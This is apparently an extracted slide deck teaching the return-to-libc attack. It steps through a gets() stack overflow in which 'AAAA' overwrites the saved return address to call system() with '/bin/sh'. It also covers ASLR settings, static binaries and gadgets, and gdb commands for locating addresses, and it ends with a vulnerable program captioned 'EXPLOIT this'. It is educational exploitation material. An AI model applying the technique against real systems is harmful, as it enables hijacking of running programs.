Атака возврата в библиотеку return to libc attack
What is libc ?
What is libc ?
What is libc ?
ret2libc
ret2libc
Where is /bin/sh ?
Where is /bin/sh ?
What about randomization
Static compile
Static compile (-s)
Static compile (-s)
GDB commands
Now

Return to libc attack

1. Атака возврата в библиотеку return to libc attack

2. What is libc ?

55cdfefe3000
Prog.elf
7f11866a7000
libc.so
7f1186c82000
ld-linux-x86-64.so

3. What is libc ?

55cdfefe3000
Prog.elf .text
Prog.elf .data
Prog.elf .bss
Prog.elf .plt
7f11866a7000
libc.so .text
libc.so .data
libc.so .bss
libc.so .plt

4. What is libc ?

// You program
main
call printf
ret
plt:
jmp printf
// libc.so
printf

ret
Puts

ret
System

ret

5. ret2libc

1. We know version of libc.so
2. We know address of libc.so
3. We know any function address at libc.so

6. ret2libc

int main (){
char buf [16];
gets(buf);
}
char buf[16]
ebp before main
ret from main

7.

ret2libc
Main:
1. push ebp
eip
2. mov ebp, esp
3. sub esp, 16
4. lea edx, buf
5. push edx
6. call gets
7. add esp, 4
8. leave
9. Ret
…………………………………….
10. system :
11.

12
ret
13. Printf:
14.

15.
ret
Ret from main
.stack ; segment with stack

8.

ret2libc
Main:
1. push ebp
2. mov ebp, esp eip
3. sub esp, 16
4. lea edx, buf
5. push edx
6. call gets
7. add esp, 4
8. leave
9. Ret
…………………………………….
10. system :
11.

12
ret
13. Printf:
14.

15.
ret
old ebp
Ret from main
.stack ; segment with stack

9.

ret2libc
Main:
1. push ebp
2. mov ebp, esp
3. sub esp, 16 eip
4. lea edx, buf
5. push edx
6. call gets
7. add esp, 4
8. leave
9. Ret
…………………………………….
10. system :
11.

12
ret
13. Printf:
14.

15.
ret
1
2
3
4
5
6
7
8
9
ebp=8
old ebp
Ret from main
.stack ; segment with stack

10.

ret2libc
Main:
1. push ebp
2. mov ebp, esp
3. sub esp, 16
4. lea edx, buf eip
5. push edx
6. call gets
7. add esp, 4
8. leave
9. Ret
…………………………………….
10. system :
11.

12
ret
13. Printf:
14.

15.
ret
1
2
3
4
5
6
7
8
9
ebp=8
Char buf[16]
old ebp
Ret from main
.stack ; segment with stack

11.

ret2libc
Main:
1. push ebp
2. mov ebp, esp
3. sub esp, 16
4. lea edx, buf
5. push edx
eip
6. call gets
7. add esp, 4
8. leave
9. Ret
…………………………………….
10. system :
11.

12
ret
13. Printf:
14.

15.
ret
1
2
3
4
5
6
7
8
9
ebp=8
edx=4
Char buf[16]
old ebp
Ret from main
.stack ; segment with stack

12.

ret2libc
Main:
1. push ebp
2. mov ebp, esp
3. sub esp, 16
4. lea edx, buf
5. push edx
6. call gets
eip
7. add esp, 4
8. leave
9. Ret
…………………………………….
10. system :
11.

12
ret
13. Printf:
14.

15.
ret
1
2
3
4
5
6
7
8
9
ebp=8
edx=4
4
Char buf[16]
old ebp
Ret from main
.stack ; segment with stack

13.

ret2libc
Main:
1. push ebp
2. mov ebp, esp
3. sub esp, 16
4. lea edx, buf
5. push edx
6. call gets
7. add esp, 4 eip
8. leave
9. Ret
…………………………………….
10. system :
11.

12
ret
13. Printf:
14.

15.
ret
1
2
3
4
4
AAAA
5
AAAA
6
AAAA
AAAA
7
8
old ebp|AAAA
9 Ret from main|AAAA
.stack ; segment with stack
ebp=8
edx=4

14.

ret2libc
Main:
1. push ebp
2. mov ebp, esp
3. sub esp, 16
4. lea edx, buf
5. push edx
6. call gets
7. add esp, 4
8. leave
eip
9. Ret
…………………………………….
10. system :
11.

12
ret
13. Printf:
14.

15.
ret
1
2
3
4
AAAA
5
AAAA
6
AAAA
AAAA
7
8
old ebp|AAAA
9 Ret from main|AAAA
.stack ; segment with stack
ebp=8
edx=4

15.

ret2libc
Main:
1. push ebp
2. mov ebp, esp
3. sub esp, 16
4. lea edx, buf
5. push edx
6. call gets
7. add esp, 4
8. leave
eip
9. Ret
…………………………………….
10. system :
11.

12
ret
13. Printf:
14.

15.
ret
1
2
3
4
5
6
7
8
9
ebp=AAAA
edx=4
Ret from main|syscall
.stack ; segment with stack

16.

system =?

17.

system =printf-CONST

18.

system =libc.so:system

19.

ret2libc
Main:
1. push ebp
2. mov ebp, esp
3. sub esp, 16
4. lea edx, buf
5. push edx
6. call gets
7. add esp, 4
8. leave
eip
9. Ret
…………………………………….
10. system :
11.

12
ret
13. Printf:
14.

15.
ret
1
2
3
4
5
6
7
8
9
ebp=AAAA
edx=4
Ret from main|syscall
.stack ; segment with stack

20.

ret2libc
9.
ret
…………………………………….
10. system :
eip
11.

12
ret
13. Printf:
14.

15.
ret
1
2
3
4
5
6
7
8
9
10
11
.stack ; segment with stack
ebp=AAAA
edx=4

21.

ret2libc
9.
ret
…………………………………….
10. system:
eip
11.

12
ret
13. Printf:
14.

15.
ret
1
2
3
4
5
6
7
8
9
10
11
ebp=AAAA
edx=4
Ret from main|syscall
Ret from syscall
Ref to “/bin/sh”
.stack ; segment with stack

22. Where is /bin/sh ?

23. Where is /bin/sh ?

ropchain

24. What about randomization

/proc/sys/kernel/randomize_va_space
0 – No randomization. Everything is static.
1 – Conservative randomization. Shared libraries,
stack, mmap(), VDSO and heap are randomized.
2 – Full randomization. In addition to elements listed
in the previous point, memory managed through
brk() is also randomized.

25. Static compile

55cdfefe3000
Prog.elf
7f11866a7000
libc.so
7f1186c82000
ld-linux-x86-64.so

26. Static compile (-s)

Prog.elf
Prog.elf
libc.so
libc.so
ld-linux-x86-64.so
ld-linux-x86-64.so

27. Static compile (-s)

1.
2.
3.
4.
Works in any linux with any libc installed
ELF contains entire libraries
Very big binary
You can find many functions an gadgets - dangerous

28. GDB commands

gdb:
maint info sections – show sections
shell ps aux | grep test – show process pid
cat /proc/[PID]/maps – show sections of process
find [START ADDRESS], [END ADDRESS], “[STRING]”
shell:
ldd test

29. Now

#include <stdio.h>
int main(){
char buf[16];
gets(buf);
puts(buf);
return 0;
}
EXPLOIT this
English     Русский Правила